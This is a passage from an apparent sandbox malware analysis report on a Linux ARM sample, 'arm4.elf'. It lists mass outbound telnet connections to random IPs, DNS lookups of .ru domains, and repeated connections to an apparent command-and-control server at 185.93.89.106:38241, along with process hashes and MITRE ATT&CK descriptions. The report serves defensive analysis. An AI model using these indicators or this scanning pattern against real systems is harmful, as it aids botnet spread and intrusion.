Feb 10, 2025 20:58:09.138103962 CET	51962	23	192.168.2.23	85.114.179.192
Feb 10, 2025 20:58:09.138118029 CET	44756	23	192.168.2.23	190.222.166.187
Feb 10, 2025 20:58:09.138122082 CET	32976	23	192.168.2.23	160.24.255.58
Feb 10, 2025 20:58:09.138122082 CET	55490	23	192.168.2.23	16.72.19.8
Feb 10, 2025 20:58:09.138122082 CET	47384	23	192.168.2.23	140.232.20.133
Feb 10, 2025 20:58:09.138124943 CET	42072	23	192.168.2.23	64.191.69.190
Feb 10, 2025 20:58:09.138128042 CET	34786	23	192.168.2.23	3.185.109.249
Feb 10, 2025 20:58:09.138128996 CET	60762	23	192.168.2.23	152.232.52.0
Feb 10, 2025 20:58:09.138140917 CET	39072	23	192.168.2.23	134.64.22.190
Feb 10, 2025 20:58:09.138150930 CET	60198	23	192.168.2.23	23.185.156.128
Feb 10, 2025 20:58:09.138153076 CET	39874	23	192.168.2.23	37.22.199.62
Feb 10, 2025 20:58:09.138153076 CET	34508	23	192.168.2.23	37.167.173.36
Feb 10, 2025 20:58:09.138165951 CET	45238	23	192.168.2.23	91.57.48.123
Feb 10, 2025 20:58:09.138170958 CET	43424	23	192.168.2.23	118.163.76.89
Feb 10, 2025 20:58:09.138171911 CET	59958	23	192.168.2.23	57.120.199.241
Feb 10, 2025 20:58:09.138180971 CET	35182	23	192.168.2.23	102.30.246.215
Feb 10, 2025 20:58:09.138195038 CET	58308	23	192.168.2.23	21.246.80.80
Feb 10, 2025 20:58:09.138195038 CET	55064	23	192.168.2.23	45.215.74.98
Feb 10, 2025 20:58:09.138195038 CET	60288	23	192.168.2.23	79.163.40.134
Feb 10, 2025 20:58:09.138195992 CET	36070	23	192.168.2.23	80.77.205.68
Feb 10, 2025 20:58:09.138202906 CET	54252	23	192.168.2.23	28.43.37.155
Feb 10, 2025 20:58:09.138219118 CET	58346	23	192.168.2.23	82.241.224.181
Feb 10, 2025 20:58:09.138220072 CET	49802	23	192.168.2.23	34.165.31.3
Feb 10, 2025 20:58:09.138221025 CET	33916	23	192.168.2.23	92.103.255.193
Feb 10, 2025 20:58:09.138223886 CET	59246	23	192.168.2.23	41.87.27.147
Feb 10, 2025 20:58:09.138227940 CET	48468	23	192.168.2.23	201.73.138.150
Feb 10, 2025 20:58:09.138231993 CET	57402	23	192.168.2.23	163.69.161.84
Feb 10, 2025 20:58:09.138238907 CET	36544	23	192.168.2.23	47.10.180.5
Feb 10, 2025 20:58:09.138238907 CET	49000	23	192.168.2.23	182.109.211.92
Feb 10, 2025 20:58:09.138248920 CET	46640	23	192.168.2.23	47.200.110.237
Feb 10, 2025 20:58:09.138251066 CET	55080	23	192.168.2.23	73.139.184.123
Feb 10, 2025 20:58:09.138259888 CET	46280	23	192.168.2.23	150.171.47.88
Feb 10, 2025 20:58:09.138266087 CET	55136	23	192.168.2.23	13.84.114.117
Feb 10, 2025 20:58:09.138273001 CET	50600	23	192.168.2.23	175.114.233.75
Feb 10, 2025 20:58:09.138276100 CET	59798	23	192.168.2.23	88.12.42.142
Feb 10, 2025 20:58:09.138287067 CET	36540	23	192.168.2.23	16.77.138.247
Feb 10, 2025 20:58:09.142966032 CET	23	45104	132.67.217.202	192.168.2.23
Feb 10, 2025 20:58:09.143032074 CET	45104	23	192.168.2.23	132.67.217.202
Feb 10, 2025 20:58:09.143507957 CET	23	47144	121.225.65.36	192.168.2.23
Feb 10, 2025 20:58:09.143517971 CET	23	54410	150.130.165.69	192.168.2.23
Feb 10, 2025 20:58:09.143544912 CET	47144	23	192.168.2.23	121.225.65.36
Feb 10, 2025 20:58:09.143557072 CET	54410	23	192.168.2.23	150.130.165.69
Feb 10, 2025 20:58:09.143565893 CET	23	46014	128.89.3.116	192.168.2.23
Feb 10, 2025 20:58:09.143577099 CET	23	47164	45.109.172.245	192.168.2.23
Feb 10, 2025 20:58:09.143624067 CET	47164	23	192.168.2.23	45.109.172.245
Feb 10, 2025 20:58:09.143632889 CET	23	47978	175.60.24.197	192.168.2.23
Feb 10, 2025 20:58:09.143640995 CET	46014	23	192.168.2.23	128.89.3.116
Feb 10, 2025 20:58:09.143649101 CET	23	54154	105.62.19.186	192.168.2.23
Feb 10, 2025 20:58:09.143659115 CET	23	56570	53.38.26.227	192.168.2.23
Feb 10, 2025 20:58:09.143667936 CET	23	39876	136.112.202.104	192.168.2.23
Feb 10, 2025 20:58:09.143672943 CET	47978	23	192.168.2.23	175.60.24.197
Feb 10, 2025 20:58:09.143677950 CET	23	54740	28.100.168.250	192.168.2.23
Feb 10, 2025 20:58:09.143677950 CET	54154	23	192.168.2.23	105.62.19.186
Feb 10, 2025 20:58:09.143687010 CET	23	43164	23.207.79.23	192.168.2.23
Feb 10, 2025 20:58:09.143699884 CET	39876	23	192.168.2.23	136.112.202.104
Feb 10, 2025 20:58:09.143707991 CET	56570	23	192.168.2.23	53.38.26.227
Feb 10, 2025 20:58:09.143707991 CET	54740	23	192.168.2.23	28.100.168.250
Feb 10, 2025 20:58:09.143718958 CET	23	40150	2.250.184.17	192.168.2.23
Feb 10, 2025 20:58:09.143729925 CET	23	43446	147.156.231.127	192.168.2.23
Feb 10, 2025 20:58:09.143735886 CET	43164	23	192.168.2.23	23.207.79.23
Feb 10, 2025 20:58:09.143738031 CET	23	50950	162.39.13.215	192.168.2.23
Feb 10, 2025 20:58:09.143748045 CET	23	40534	145.15.146.255	192.168.2.23
Feb 10, 2025 20:58:09.143754005 CET	40150	23	192.168.2.23	2.250.184.17
Feb 10, 2025 20:58:09.143757105 CET	23	51962	85.114.179.192	192.168.2.23
Feb 10, 2025 20:58:09.143762112 CET	43446	23	192.168.2.23	147.156.231.127
Feb 10, 2025 20:58:09.143767118 CET	23	44756	190.222.166.187	192.168.2.23
Feb 10, 2025 20:58:09.143774986 CET	23	32976	160.24.255.58	192.168.2.23
Feb 10, 2025 20:58:09.143778086 CET	50950	23	192.168.2.23	162.39.13.215
Feb 10, 2025 20:58:09.143778086 CET	40534	23	192.168.2.23	145.15.146.255
Feb 10, 2025 20:58:09.143779039 CET	23	42072	64.191.69.190	192.168.2.23
Feb 10, 2025 20:58:09.143789053 CET	23	55490	16.72.19.8	192.168.2.23
Feb 10, 2025 20:58:09.143804073 CET	23	47384	140.232.20.133	192.168.2.23
Feb 10, 2025 20:58:09.143804073 CET	51962	23	192.168.2.23	85.114.179.192
Feb 10, 2025 20:58:09.143814087 CET	23	34786	3.185.109.249	192.168.2.23
Feb 10, 2025 20:58:09.143815994 CET	44756	23	192.168.2.23	190.222.166.187
Feb 10, 2025 20:58:09.143816948 CET	42072	23	192.168.2.23	64.191.69.190
Feb 10, 2025 20:58:09.143821001 CET	55490	23	192.168.2.23	16.72.19.8
Feb 10, 2025 20:58:09.143827915 CET	32976	23	192.168.2.23	160.24.255.58
Feb 10, 2025 20:58:09.143829107 CET	23	60762	152.232.52.0	192.168.2.23
Feb 10, 2025 20:58:09.143836975 CET	47384	23	192.168.2.23	140.232.20.133
Feb 10, 2025 20:58:09.143855095 CET	34786	23	192.168.2.23	3.185.109.249
Feb 10, 2025 20:58:09.143882036 CET	60762	23	192.168.2.23	152.232.52.0
Feb 10, 2025 20:58:09.145673037 CET	23	39072	134.64.22.190	192.168.2.23
Feb 10, 2025 20:58:09.145683050 CET	23	60198	23.185.156.128	192.168.2.23
Feb 10, 2025 20:58:09.145709991 CET	39072	23	192.168.2.23	134.64.22.190
Feb 10, 2025 20:58:09.145729065 CET	60198	23	192.168.2.23	23.185.156.128
Feb 10, 2025 20:58:09.145742893 CET	23	39874	37.22.199.62	192.168.2.23
Feb 10, 2025 20:58:09.145761967 CET	23	34508	37.167.173.36	192.168.2.23
Feb 10, 2025 20:58:09.145787954 CET	39874	23	192.168.2.23	37.22.199.62
Feb 10, 2025 20:58:09.145803928 CET	34508	23	192.168.2.23	37.167.173.36
Feb 10, 2025 20:58:09.145818949 CET	23	43424	118.163.76.89	192.168.2.23
Feb 10, 2025 20:58:09.145828009 CET	23	45238	91.57.48.123	192.168.2.23
Feb 10, 2025 20:58:09.145833015 CET	23	59958	57.120.199.241	192.168.2.23
Feb 10, 2025 20:58:09.145838022 CET	23	35182	102.30.246.215	192.168.2.23
Feb 10, 2025 20:58:09.145859957 CET	43424	23	192.168.2.23	118.163.76.89
Feb 10, 2025 20:58:09.145888090 CET	59958	23	192.168.2.23	57.120.199.241
Feb 10, 2025 20:58:09.145889044 CET	45238	23	192.168.2.23	91.57.48.123
Feb 10, 2025 20:58:09.145891905 CET	35182	23	192.168.2.23	102.30.246.215
Feb 10, 2025 20:58:09.145915985 CET	23	60288	79.163.40.134	192.168.2.23
Feb 10, 2025 20:58:09.145924091 CET	23	36070	80.77.205.68	192.168.2.23
Feb 10, 2025 20:58:09.145931959 CET	23	58308	21.246.80.80	192.168.2.23
Feb 10, 2025 20:58:09.145941019 CET	60288	23	192.168.2.23	79.163.40.134
Feb 10, 2025 20:58:09.145981073 CET	36070	23	192.168.2.23	80.77.205.68
Feb 10, 2025 20:58:09.145984888 CET	58308	23	192.168.2.23	21.246.80.80
Feb 10, 2025 20:58:09.146017075 CET	23	55064	45.215.74.98	192.168.2.23
Feb 10, 2025 20:58:09.146027088 CET	23	54252	28.43.37.155	192.168.2.23
Feb 10, 2025 20:58:09.146035910 CET	23	58346	82.241.224.181	192.168.2.23
Feb 10, 2025 20:58:09.146047115 CET	55064	23	192.168.2.23	45.215.74.98
Feb 10, 2025 20:58:09.146055937 CET	23	49802	34.165.31.3	192.168.2.23
Feb 10, 2025 20:58:09.146064043 CET	23	36540	16.77.138.247	192.168.2.23
Feb 10, 2025 20:58:09.146066904 CET	54252	23	192.168.2.23	28.43.37.155
Feb 10, 2025 20:58:09.146071911 CET	23	59798	88.12.42.142	192.168.2.23
Feb 10, 2025 20:58:09.146074057 CET	58346	23	192.168.2.23	82.241.224.181
Feb 10, 2025 20:58:09.146084070 CET	23	50600	175.114.233.75	192.168.2.23
Feb 10, 2025 20:58:09.146090984 CET	49802	23	192.168.2.23	34.165.31.3
Feb 10, 2025 20:58:09.146094084 CET	23	33916	92.103.255.193	192.168.2.23
Feb 10, 2025 20:58:09.146101952 CET	23	55136	13.84.114.117	192.168.2.23
Feb 10, 2025 20:58:09.146111012 CET	23	46280	150.171.47.88	192.168.2.23
Feb 10, 2025 20:58:09.146119118 CET	23	46640	47.200.110.237	192.168.2.23
Feb 10, 2025 20:58:09.146126986 CET	23	55080	73.139.184.123	192.168.2.23
Feb 10, 2025 20:58:09.146135092 CET	23	59246	41.87.27.147	192.168.2.23
Feb 10, 2025 20:58:09.146135092 CET	33916	23	192.168.2.23	92.103.255.193
Feb 10, 2025 20:58:09.146142960 CET	23	49000	182.109.211.92	192.168.2.23
Feb 10, 2025 20:58:09.146151066 CET	23	36544	47.10.180.5	192.168.2.23
Feb 10, 2025 20:58:09.146169901 CET	23	57402	163.69.161.84	192.168.2.23
Feb 10, 2025 20:58:09.146176100 CET	59246	23	192.168.2.23	41.87.27.147
Feb 10, 2025 20:58:09.146183014 CET	23	48468	201.73.138.150	192.168.2.23
Feb 10, 2025 20:58:09.146192074 CET	23	48468	201.73.138.150	192.168.2.23
Feb 10, 2025 20:58:09.146194935 CET	23	57402	163.69.161.84	192.168.2.23
Feb 10, 2025 20:58:09.146198034 CET	23	36544	47.10.180.5	192.168.2.23
Feb 10, 2025 20:58:09.146205902 CET	23	49000	182.109.211.92	192.168.2.23
Feb 10, 2025 20:58:09.146214008 CET	23	55080	73.139.184.123	192.168.2.23
Feb 10, 2025 20:58:09.146220922 CET	23	46640	47.200.110.237	192.168.2.23
Feb 10, 2025 20:58:09.146229029 CET	23	46280	150.171.47.88	192.168.2.23
Feb 10, 2025 20:58:09.146239996 CET	48468	23	192.168.2.23	201.73.138.150
Feb 10, 2025 20:58:09.146240950 CET	57402	23	192.168.2.23	163.69.161.84
Feb 10, 2025 20:58:09.146240950 CET	55080	23	192.168.2.23	73.139.184.123
Feb 10, 2025 20:58:09.146244049 CET	23	55136	13.84.114.117	192.168.2.23
Feb 10, 2025 20:58:09.146245956 CET	36544	23	192.168.2.23	47.10.180.5
Feb 10, 2025 20:58:09.146249056 CET	46640	23	192.168.2.23	47.200.110.237
Feb 10, 2025 20:58:09.146250010 CET	49000	23	192.168.2.23	182.109.211.92
Feb 10, 2025 20:58:09.146258116 CET	23	50600	175.114.233.75	192.168.2.23
Feb 10, 2025 20:58:09.146265984 CET	23	59798	88.12.42.142	192.168.2.23
Feb 10, 2025 20:58:09.146270037 CET	23	36540	16.77.138.247	192.168.2.23
Feb 10, 2025 20:58:09.146274090 CET	55136	23	192.168.2.23	13.84.114.117
Feb 10, 2025 20:58:09.146272898 CET	46280	23	192.168.2.23	150.171.47.88
Feb 10, 2025 20:58:09.146297932 CET	36540	23	192.168.2.23	16.77.138.247
Feb 10, 2025 20:58:09.146301031 CET	59798	23	192.168.2.23	88.12.42.142
Feb 10, 2025 20:58:09.146330118 CET	50600	23	192.168.2.23	175.114.233.75
Feb 10, 2025 20:58:10.053018093 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:10.059966087 CET	38241	39802	185.93.89.106	192.168.2.23
Feb 10, 2025 20:58:10.060059071 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:10.061018944 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:10.066962957 CET	38241	39802	185.93.89.106	192.168.2.23
Feb 10, 2025 20:58:10.067023039 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:10.073265076 CET	38241	39802	185.93.89.106	192.168.2.23
Feb 10, 2025 20:58:10.677023888 CET	38241	39802	185.93.89.106	192.168.2.23
Feb 10, 2025 20:58:10.677119017 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:10.677119017 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:11.686759949 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:11.691595078 CET	38241	39804	185.93.89.106	192.168.2.23
Feb 10, 2025 20:58:11.691668034 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:11.692815065 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:11.697647095 CET	38241	39804	185.93.89.106	192.168.2.23
Feb 10, 2025 20:58:11.697722912 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:11.702488899 CET	38241	39804	185.93.89.106	192.168.2.23
Feb 10, 2025 20:58:12.326867104 CET	38241	39804	185.93.89.106	192.168.2.23
Feb 10, 2025 20:58:12.326961994 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:12.326961994 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:13.336767912 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:13.341604948 CET	38241	39806	185.93.89.106	192.168.2.23
Feb 10, 2025 20:58:13.341703892 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:13.342878103 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:13.347628117 CET	38241	39806	185.93.89.106	192.168.2.23
Feb 10, 2025 20:58:13.347721100 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:13.352500916 CET	38241	39806	185.93.89.106	192.168.2.23
Feb 10, 2025 20:58:14.202831030 CET	42836	443	192.168.2.23	91.189.91.43
Feb 10, 2025 20:58:15.734702110 CET	42516	80	192.168.2.23	109.202.202.202
Feb 10, 2025 20:58:23.349750042 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:23.354578972 CET	38241	39806	185.93.89.106	192.168.2.23
Feb 10, 2025 20:58:23.522612095 CET	38241	39806	185.93.89.106	192.168.2.23
Feb 10, 2025 20:58:23.522684097 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:30.580668926 CET	43928	443	192.168.2.23	91.189.91.42
Feb 10, 2025 20:58:40.819335938 CET	42836	443	192.168.2.23	91.189.91.43
Feb 10, 2025 20:58:46.962488890 CET	42516	80	192.168.2.23	109.202.202.202
Feb 10, 2025 20:59:11.535307884 CET	43928	443	192.168.2.23	91.189.91.42
Feb 10, 2025 20:59:23.561642885 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:59:23.566528082 CET	38241	39806	185.93.89.106	192.168.2.23
Feb 10, 2025 20:59:23.737910032 CET	38241	39806	185.93.89.106	192.168.2.23
Feb 10, 2025 20:59:23.738020897 CET	39806	38241	192.168.2.23	185.93.89.106

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 10, 2025 20:58:08.397197008 CET	55634	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:58:08.408304930 CET	53	55634	8.8.8.8	192.168.2.23
Feb 10, 2025 20:58:10.045763969 CET	42284	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:58:10.052094936 CET	53	42284	8.8.8.8	192.168.2.23
Feb 10, 2025 20:58:11.679816008 CET	44523	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:58:11.686148882 CET	53	44523	8.8.8.8	192.168.2.23
Feb 10, 2025 20:58:13.329690933 CET	56123	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:58:13.336143970 CET	53	56123	8.8.8.8	192.168.2.23

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 10, 2025 20:58:08.397197008 CET	192.168.2.23	8.8.8.8	0x9ced	Standard query (0)	cat-are-here.ru	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:58:10.045763969 CET	192.168.2.23	8.8.8.8	0xd09d	Standard query (0)	cuttiecats.ru. [malformed]	256	338	false
Feb 10, 2025 20:58:11.679816008 CET	192.168.2.23	8.8.8.8	0x9cf4	Standard query (0)	kittlez.ru. [malformed]	256	339	false
Feb 10, 2025 20:58:13.329690933 CET	192.168.2.23	8.8.8.8	0x41b3	Standard query (0)	polizei.su. [malformed]	256	341	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 10, 2025 20:58:08.408304930 CET	8.8.8.8	192.168.2.23	0x9ced	No error (0)	cat-are-here.ru		185.93.89.106	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: arm4.elf PID: 6233, Parent PID: 6157

General

Start time (UTC):	19:58:06
Start date (UTC):	10/02/2025
Path:	/tmp/arm4.elf
Arguments:	/tmp/arm4.elf
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	19:58:06
Start date (UTC):	10/02/2025
Path:	/tmp/arm4.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	19:58:06
Start date (UTC):	10/02/2025
Path:	/tmp/arm4.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	19:58:07
Start date (UTC):	10/02/2025
Path:	/tmp/arm4.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	19:58:07
Start date (UTC):	10/02/2025
Path:	/tmp/arm4.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	19:58:07
Start date (UTC):	10/02/2025
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Start time (UTC):	19:58:07
Start date (UTC):	10/02/2025
Path:	/etc/gdm3/PrimeOff/Default
Arguments:	/etc/gdm3/PrimeOff/Default
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	19:58:07
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:58:07
Start date (UTC):	10/02/2025
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Start time (UTC):	19:58:07
Start date (UTC):	10/02/2025
Path:	/etc/gdm3/PrimeOff/Default
Arguments:	/etc/gdm3/PrimeOff/Default
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	19:58:08
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:58:08
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:58:08
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:58:08
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfdesktop
Arguments:	xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
File size:	473520 bytes
MD5 hash:	dfb13e1581f80065dcea16f2476f16f2

Start time (UTC):	19:58:08
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:58:08
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-panel
Arguments:	xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec
File size:	375768 bytes
MD5 hash:	a15b657c7d54ac1385f1f15004ea6784

Start time (UTC):	19:58:08
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:58:08
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:58:08
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:58:08
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:58:08
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfwm4
Arguments:	xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c
File size:	420424 bytes
MD5 hash:	59defa3c00cc30d85ed77b738d55e9da

Start time (UTC):	19:58:08
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:58:08
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfdesktop
Arguments:	xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
File size:	473520 bytes
MD5 hash:	dfb13e1581f80065dcea16f2476f16f2

Start time (UTC):	19:58:08
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:58:08
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-panel
Arguments:	xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec
File size:	375768 bytes
MD5 hash:	a15b657c7d54ac1385f1f15004ea6784

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
Tactics:	Credential Access
Data Sources:	Application Log: Application Log Content, Command: Command Execution, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.
Tactics:	Impact
Data Sources:	Command: Command Execution, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Termination, Service: Service Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report arm4.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: arm4.elf PID: 6233, Parent PID: 6157

General

Chronological Activities

Analysis Process: arm4.elf PID: 6235, Parent PID: 6233

General

Chronological Activities

Analysis Process: arm4.elf PID: 6237, Parent PID: 6235

General

Chronological Activities

Analysis Process: arm4.elf PID: 6241, Parent PID: 6235

General

Chronological Activities

Analysis Process: arm4.elf PID: 6242, Parent PID: 6235

General

Chronological Activities

Analysis Process: gdm3 PID: 6267, Parent PID: 1320

General

Linux Analysis Report
arm4.elf